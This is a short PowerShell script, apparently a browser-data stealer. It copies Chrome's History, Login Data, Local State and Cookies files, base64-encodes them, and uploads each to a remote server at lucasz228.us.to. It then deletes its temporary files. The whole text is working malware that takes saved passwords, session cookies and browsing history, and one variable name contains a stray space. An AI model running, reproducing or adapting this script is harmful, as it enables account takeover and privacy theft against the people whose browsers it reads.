Copy-Item "$($env:USERPROFILE)\AppData\Local\Google\Chrome\User Data\Default\History" "$($env:USERPROFILE)\out.f"
$base64string = [Convert]::ToBase64String([IO.File]::ReadAllBytes("$($env:USERPROFILE)\out.f"))
echo $base64string > "$($env:USERPROFILE)\out.txt"

Copy-Item "$($env:USERPROFILE)\AppData\Local\Google\Chrome\User Data\Default\Login Data" "$($env:USERPROFILE)\out2.f"
$base64string = [Convert]::ToBase64String([IO.File]::ReadAllBytes("$($env:USERPROFILE)\out2.f"))
echo $base64string > "$($env:USERPROFILE)\out2.txt"

Copy-Item "$($env:USERPROFILE)\AppData\Local\Google\Chrome\User Data\Default\Local State" "$($env:USERPROFILE)\out3.f"
$base64string = [Convert]::ToBase64String([IO.File]::ReadAllBytes("$($env:USERPROFILE)\out3.f"))
echo $base64string > "$($env:USERPROFILE)\out3.txt"

Copy-Item "$($env:USERPROFILE)\AppData\Local\Google\Chrome\User Data\Default\Cookies" "$($env:USERPROFILE)\out4.f"
$base64string = [Convert]::ToBase64String([IO.File]::ReadAllBytes("$($env:USERPROFILE)\out4.f"))
echo $base64string > "$($env:USERPROFI LE)\out4.txt"

Invoke-WebRequest -Uri http://lucasz228.us.to:50000/saveHistory -Method POST -Body @{text=Get-Content "$($env:USERPROFILE)\out.txt" -Raw}
Invoke-WebRequest -Uri http://lucasz228.us.to:50000/saveLoginData -Method POST -Body @{text=Get-Content "$($env:USERPROFILE)\out2.txt" -Raw}
Invoke-WebRequest -Uri http://lucasz228.us.to:50000/saveLocalState -Method POST -Body @{text=Get-Content "$($env:USERPROFILE)\out3.txt" -Raw}
Invoke-WebRequest -Uri http://lucasz228.us.to:50000/saveCookie -Method POST -Body @{text=Get-Content "$($env:USERPROFILE)\out4.txt" -Raw}

Remove-Item "$($env:USERPROFILE)\out.txt"
Remove-Item "$($env:USERPROFILE)\out2.txt"
Remove-Item "$($env:USERPROFILE)\out3.txt"
Remove-Item "$($env:USERPROFILE)\out4.txt"
Remove-Item "$($env:USERPROFILE)\out.f"
Remove-Item "$($env:USERPROFILE)\out2.f"
Remove-Item "$($env:USERPROFILE)\out3.f"
Remove-Item "$($env:USERPROFILE)\out4.f"
